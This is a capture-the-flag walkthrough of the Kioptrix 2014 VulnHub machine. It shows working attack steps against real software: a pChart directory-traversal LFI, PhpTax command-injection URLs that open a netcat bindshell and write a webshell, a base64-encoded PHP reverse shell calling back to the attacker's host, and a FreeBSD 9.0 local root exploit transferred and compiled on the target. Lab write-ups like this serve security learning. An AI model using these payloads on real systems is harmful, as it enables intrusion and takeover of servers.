NOTES ABOUT Kioptrix 2014
[ 2017-09-09 ] [ VulnHub / Kioptrix 2014 ]Status: Rooted
Skills: Port Scanning, Fuzzing, LFI, PHP, Reverse Shell, FreeBSD Exploit
Tools: nmap, LFI-Digger, User Agent Switch, nc, searchsploit, gcc
PORT SCANNING
root@kali:~/CTF/kioptrix# nmap -v -sS -A -p- 10.17.0.106 [...] PORT STATE SERVICE VERSION 22/tcp closed ssh 80/tcp open http Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8) |_http-title: Site doesnt have a title (text/html). |_xmlrpc-methods: ERROR: Script execution failed (use -d to debug) 8080/tcp open http Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8) |_http-title: 403 Forbidden |_xmlrpc-methods: ERROR: Script execution failed (use -d to debug) [...]
root@kali:~/CTF/kioptrix# wfuzz -c -w /usr/share/wordlists/dirb/common.txt --script=headers,robots,sitemap,listing,links --hc 404 http://10.17.0.106:8080/FUZZ ******************************************************** * Wfuzz 2.1.3 - The Web Bruteforcer * ******************************************************** Target: http://10.17.0.106:8080/FUZZ Total requests: 4614 ================================================================== ID Response Lines Word Chars Request ================================================================== 00050: C=200 10 L 22 W 201 Ch "" |_ Directory listing identified |_ Plugin links enqueued 1 more requests (rlevel=1) 00760: C=403 8 L 22 W 210 Ch "cgi-bin/" 02414: C=403 8 L 22 W 211 Ch ".htpasswd" 04606: C=200 90 L 376 W 11974 Ch "/phptax/" |_ Powered-by header first set - PHP/5.3.8
<html> <head> <!-- <META HTTP-EQUIV="refresh" CONTENT="5;URL=pChart2.1.3/index.php"> --> </head> <body> <h1>It works!</h1> </body> </html>
root@kali:~/CTF/kioptrix# searchsploit pchart
------------------------------------------------------------------------------------------------------------------- ----------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/platforms)
------------------------------------------------------------------------------------------------------------------- ----------------------------------
pChart 2.1.3 - Multiple Vulnerabilities | ./php/webapps/31173.txt
------------------------------------------------------------------------------------------------------------------- ----------------------------------
root@kali:~/CTF/kioptrix# cat /usr/share/exploitdb/platforms/php/webapps/31173.txt
# Exploit Title: pChart 2.1.3 Directory Traversal and Reflected XSS
[...]
[1] Directory Traversal:
"hxxp://localhost/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd"
[...]
SCRIPT: https://github.com/Claor/LFI-Digger
root@kali:~/CTF/Kioptrix# lfidigger "http://10.17.0.106/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fLFI" ./dics/linux_enum.txt
[+] Message of the day - http://10.17.0.106/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2f/etc/motd
FreeBSD 9.0-RELEASE (GENERIC) #0: Tue Jan 3 07:46:30 UTC 2012
[...]
[+] Networks - http://10.17.0.106/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2f/etc/networks
[...]
[+] - http://10.17.0.106/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2f/etc/resolv.conf
[...]
[+] fstab entries - http://10.17.0.106/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2f/etc/fstab
[...]
[+] crontab - http://10.17.0.106/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2f/etc/crontab
[...]
[+] All users - http://10.17.0.106/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2f/etc/passwd
# $FreeBSD: release/9.0.0/etc/master.passwd 218047 2011-01-28 22:29:38Z pjd $
#
root:*:0:0:Charlie &:/root:/bin/csh
toor:*:0:0:Bourne-again Superuser:/root:
[...]
ossec:*:1001:1001:User &:/usr/local/ossec-hids:/sbin/nologin
ossecm:*:1002:1001:User &:/usr/local/ossec-hids:/sbin/nologin
ossecr:*:1003:1001:User &:/usr/local/ossec-hids:/sbin/nologin
[+] Groups - http://10.17.0.106/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2f/etc/group
[...]
[+] Apache config - http://10.17.0.106/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2f/usr/local/etc/apache22/httpd.conf
[...]
Listen 80
Listen 8080
[...]
DocumentRoot "/usr/local/www/apache22/data"
[...]
SetEnvIf User-Agent ^Mozilla/4.0 Mozilla4_browser
<VirtualHost *:8080>
DocumentRoot /usr/local/www/apache22/data2
<Directory "/usr/local/www/apache22/data2">
Options Indexes FollowSymLinks
AllowOverride All
Order allow,deny
Allow from env=Mozilla4_browser
</Directory>
</VirtualHost>
[...]
[+] SSH config - http://10.17.0.106/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2f/etc/ssh/sshd_config
[...]
PLUGIN: User Agent Switcher [ "Mozilla/4.0 Mozilla4_browser" ]
PHPTAX KNOWN VULNS:
root@kali:~/CTF/kioptrix# searchsploit phptax
------------------------------------------------------------------------------------------------------------------- ----------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/platforms)
------------------------------------------------------------------------------------------------------------------- ----------------------------------
PhpTax pfilez Parameter Exec Remote Code Injection | ./php/webapps/21833.rb
phptax 0.8 - Remote Code Execution Vulnerability | ./php/webapps/21665.txt
PhpTax 0.8 - File Manipulation(newvalue_field) Remote Code Execution | ./php/webapps/25849.txt
------------------------------------------------------------------------------------------------------------------- ----------------------------------
root@kali:~/CTF/kioptrix# cat /usr/share/exploitdb/platforms/php/webapps/21665.txt
-----------------------------------------------------
phptax 0.8 <= Remote Code Execution Vulnerability
-----------------------------------------------------
Discovered by: Jean Pascal Pereira
Vendor information:
"PhpTax is free software to do your U.S. income taxes. Tested under Unix environment.
The program generates .pdfs that can be printed and sent to the IRS. See homepage for details and screenshot."
Vendor URI: http://sourceforge.net/projects/phptax/
----------------------------------------------------
Risk-level: High
The application is prone to a remote code execution vulnerability.
----------------------------------------------------
drawimage.php, line 63:
include ("./files/$_GET[pfilez]");
// makes a png image
$pfilef=str_replace(".tob",".png",$_GET[pfilez]);
$pfilep=str_replace(".tob",".pdf",$_GET[pfilez]);
Header("Content-type: image/png");
if ($_GET[pdf] == "") Imagepng($image);
if ($_GET[pdf] == "make") Imagepng($image,"./data/pdf/$pfilef");
if ($_GET[pdf] == "make") exec("convert ./data/pdf/$pfilef ./data/pdf/$pfilep");
----------------------------------------------------
Exploit / Proof of Concept:
Bindshell on port 23235 using netcat:
http://localhost/phptax/drawimage.php?pfilez=xxx;%20nc%20-l%20-v%20-p%2023235%20-e%20/bin/bash;&pdf=make
** Exploit-DB Verified:**
http://localhost/phptax/index.php?pfilez=1040d1-pg2.tob;nc%20-l%20-v%20-p%2023235%20-e%20/bin/bash;&pdf=make
GETTING IN
http://10.17.0.106:8080/phptax/drawimage.php?pfilez=xxx;printf "<?php file_put_contents('rshell.php',base64_decode(\$_GET['e'])); ?>"> shellc.php;&pdf=make
WRITING [ php-reverse-shell ] TO WEB SERVER
http://10.17.0.106:8080/phptax/shellc.php?e=PD9waHAgc2V0X3RpbWVfbGltaXQoMCk7JGlwPScxMC4xNy4wLjMwJzskcG9ydD0xMjM0OyRjaHVua19zaXplPTE0MDA7JHdyaXRlX2E9bnVsbDskZXJyb3JfYT1ud WxsOyRzaGVsbD0ndW5hbWUgLWE7IHc7IGlkOyAvYmluL3NoIC1pJztjaGRpcigiLyIpO3VtYXNrKDApOyRzb2NrPWZzb2Nrb3BlbigkaXAsJHBvcnQsJGVycm5vLCRlcnJzdHIsMzApO2lmKCEkc29jayl7ZXhpdCgxKTt9JG Rlc2NyaXB0b3JzcGVjPWFycmF5KDA9PmFycmF5KCJwaXBlIiwiciIpLDE9PmFycmF5KCJwaXBlIiwidyIpLDI9PmFycmF5KCJwaXBlIiwidyIpKTskcHJvY2Vzcz1wcm9jX29wZW4oJHNoZWxsLCRkZXNjcmlwdG9yc3BlYyw kcGlwZXMpO2lmKCFpc19yZXNvdXJjZSgkcHJvY2Vzcykpe2V4aXQoMSk7fXN0cmVhbV9zZXRfYmxvY2tpbmcoJHBpcGVzWzBdLDApO3N0cmVhbV9zZXRfYmxvY2tpbmcoJHBpcGVzWzFdLDApO3N0cmVhbV9zZXRfYmxvY2tp bmcoJHBpcGVzWzJdLDApO3N0cmVhbV9zZXRfYmxvY2tpbmcoJHNvY2ssMCk7d2hpbGUoMSl7aWYoZmVvZigkc29jaykpe2JyZWFrO31pZihmZW9mKCRwaXBlc1sxXSkpe2JyZWFrO30kcmVhZF9hPWFycmF5KCRzb2NrLCRwa XBlc1sxXSwkcGlwZXNbMl0pOyRudW1fY2hhbmdlZF9zb2NrZXRzPXN0cmVhbV9zZWxlY3QoJHJlYWRfYSwkd3JpdGVfYSwkZXJyb3JfYSxudWxsKTtpZihpbl9hcnJheSgkc29jaywkcmVhZF9hKSl7JGlucHV0PWZyZWFkKC Rzb2NrLCRjaHVua19zaXplKTtmd3JpdGUoJHBpcGVzWzBdLCRpbnB1dCk7fWlmKGluX2FycmF5KCRwaXBlc1sxXSwkcmVhZF9hKSl7JGlucHV0PWZyZWFkKCRwaXBlc1sxXSwkY2h1bmtfc2l6ZSk7ZndyaXRlKCRzb2NrLCR pbnB1dCk7fWlmKGluX2FycmF5KCRwaXBlc1syXSwkcmVhZF9hKSl7JGlucHV0PWZyZWFkKCRwaXBlc1syXSwkY2h1bmtfc2l6ZSk7ZndyaXRlKCRzb2NrLCRpbnB1dCk7fX1mY2xvc2UoJHNvY2spO2ZjbG9zZSgkcGlwZXNb MF0pO2ZjbG9zZSgkcGlwZXNbMV0pO2ZjbG9zZSgkcGlwZXNbMl0pO3Byb2NfY2xvc2UoJHByb2Nlc3MpOyA/PiAK http://10.17.0.106:8080/phptax/rshell.php
root@kali:~/CTF/kioptrix# nc -lvp 1234 listening on [any] 1234 ... 10.17.0.106: inverse host lookup failed: Unknown host connect to [10.17.0.30] from (UNKNOWN) [10.17.0.106] 31652 FreeBSD kioptrix2014 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan 3 07:46:30 UTC 2012 root@farrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC amd64 1:39PM up 3:51, 0 users, load averages: 0.07, 0.08, 0.02 USER TTY FROM LOGIN@ IDLE WHAT uid=80(www) gid=80(www) groups=80(www) sh: cant access tty; job control turned off $
ELEVATING PRIVILEGES
EXPLOIT SEARCH:
root@kali:~/CTF/kioptrix# searchsploit FreeBSD 9.0
------------------------------------------------------------------------------------------------------------------- ----------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/platforms)
------------------------------------------------------------------------------------------------------------------- ----------------------------------
FreeBSD 9.0-9.1 mmap/ptrace - Privilege Escalation Exploit | ./freebsd/local/26368.c
FreeBSD 9.0 - Intel SYSRET Kernel Privilege Escalation Exploit | ./freebsd/local/28718.c
------------------------------------------------------------------------------------------------------------------- ----------------------------------
root@kali:~/CTF/kioptrix# nc -lvp 1235 < /usr/share/exploitdb/platforms/freebsd/local/26368.c
listening on [any] 1235 ...
10.17.0.106: inverse host lookup failed: Unknown host
connect to [10.17.0.30] from (UNKNOWN) [10.17.0.106] 23964
$ cd /tmp $ nc 10.17.0.30 1235 > 26368.c $ gcc 26368.c -o 26368 $ ./26368 id uid=0(root) gid=0(wheel) egid=80(www) groups=80(www)
FLAG:
If you are reading this, it means you got root (or cheated). Congratulations either way... Hope you enjoyed this new VM of mine. As always, they are made for the beginner in mind, and not meant for the seasoned pentester. However this does not mean one can't enjoy them. As with all my VMs, besides getting "root" on the system, the goal is to also learn the basics skills needed to compromise a system. Most importantly, in my mind, are information gathering & research. Anyone can throw massive amounts of exploits and "hope" it works, but think about the traffic.. the logs... Best to take it slow, and read up on the information you gathered and hopefully craft better more targetted attacks. For example, this system is FreeBSD 9. Hopefully you noticed this rather quickly. Knowing the OS gives you any idea of what will work and what won't from the get go. Default file locations are not the same on FreeBSD versus a Linux based distribution. Apache logs aren't in "/var/log/apache/access.log", but in "/var/log/httpd-access.log". It's default document root is not "/var/www/" but in "/usr/local/www/apache22/data". Finding and knowing these little details will greatly help during an attack. Of course my examples are specific for this target, but the theory applies to all systems. As a small exercise, look at the logs and see how much noise you generated. Of course the log results may not be accurate if you created a snapshot and reverted, but at least it will give you an idea. For fun, I installed "OSSEC-HIDS" and monitored a few things. Default settings, nothing fancy but it should've logged a few of your attacks. Look at the following files: /root/folderMonitor.log /root/httpd-access.log (softlink) /root/ossec-alerts.log (softlink) The folderMonitor.log file is just a cheap script of mine to track created/deleted and modified files in 2 specific folders. Since FreeBSD doesn't support "iNotify", I couldn't use OSSEC-HIDS for this. The httpd-access.log is rather self-explanatory . Lastly, the ossec-alerts.log file is OSSEC-HIDS is where it puts alerts when monitoring certain files. This one should've detected a few of your web attacks. Feel free to explore the system and other log files to see how noisy, or silent, you were. And again, thank you for taking the time to download and play. Sincerely hope you enjoyed yourself. Be good... loneferret http://www.kioptrix.com p.s.: Keep in mind, for each "web attack" detected by OSSEC-HIDS, by default it would've blocked your IP (both in hosts.allow & Firewall) for 600 seconds. I was nice enough to remove that part :)